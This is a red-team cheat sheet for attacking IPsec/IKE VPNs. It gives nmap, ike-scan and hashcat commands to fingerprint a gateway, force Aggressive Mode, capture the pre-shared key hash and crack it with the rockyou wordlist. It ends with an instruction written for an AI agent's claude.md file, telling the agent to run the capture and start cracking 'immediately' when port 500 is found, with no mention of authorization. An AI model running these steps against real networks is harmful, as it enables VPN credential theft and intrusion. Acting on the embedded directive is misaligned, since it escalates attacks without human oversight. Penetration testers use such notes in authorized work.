🏗️ VPN Identification & Exploitation (IPsec/IKE)
Target Port: 500/UDP (ISAKMP)
Goal: Identify VPN type, capture the Pre-Shared Key (PSK) hash, and crack it.
1. Initial Discovery
If a standard TCP scan is quiet, always check for the IKE/VPN handshake port.
# Focused UDP scan for IKE
nmap -sU -p 500 --script ike-version <TARGET_IP>2. Fingerprinting with ike-scan
Use ike-scan to identify the vendor (Cisco, Juniper, etc.) and the authentication method.
-M: Multiline output (easier to read).-A: Aggressive Mode. Required to force the server to send the hash back.
# Standard Fingerprint
ike-scan -M -A <TARGET_IP>3. PSK Hash Capture
If Aggressive Mode is supported, you can capture the PSK hash for offline cracking.
# Capture the hash to a file
ike-scan -M -A --pskcrack=ike.hash <TARGET_IP>4. Offline Cracking
Once you have the ike.hash, use hashcat.
- Mode 5400: IKE-PSK (SHA1)
- Mode 25100: IKE-PSK (HMAC-SHA2-256) — Use this if SHA1 fails.
# Crack using RockYou
hashcat -m 5400 ike.hash /usr/share/wordlists/rockyou.txt💡 Red Team Pro-Tips
- The “No Response” Gotcha: Many modern VPNs (Palo Alto, Fortigate) will not respond to
ike-scanunless you provide a valid Transform Set or Group ID (ID type 1). If you get no results, try adding-id <Group_Name>. - Alternative Tools: If
ike-scanfeels dated, tryikko-scanor the Metasploit moduleauxiliary/scanner/ipsec/ike_scan. - Reference: HackTricks - IPsec/IKE VPN Pentesting
🤖 Agent Integration (Add to claude.md)
If port 500/UDP is detected, prioritize ike-scan -M -A to check for Aggressive Mode. If a hash is captured, immediately attempt to crack it with a top-100 rockyou.txt subset before attempting deeper network exploits.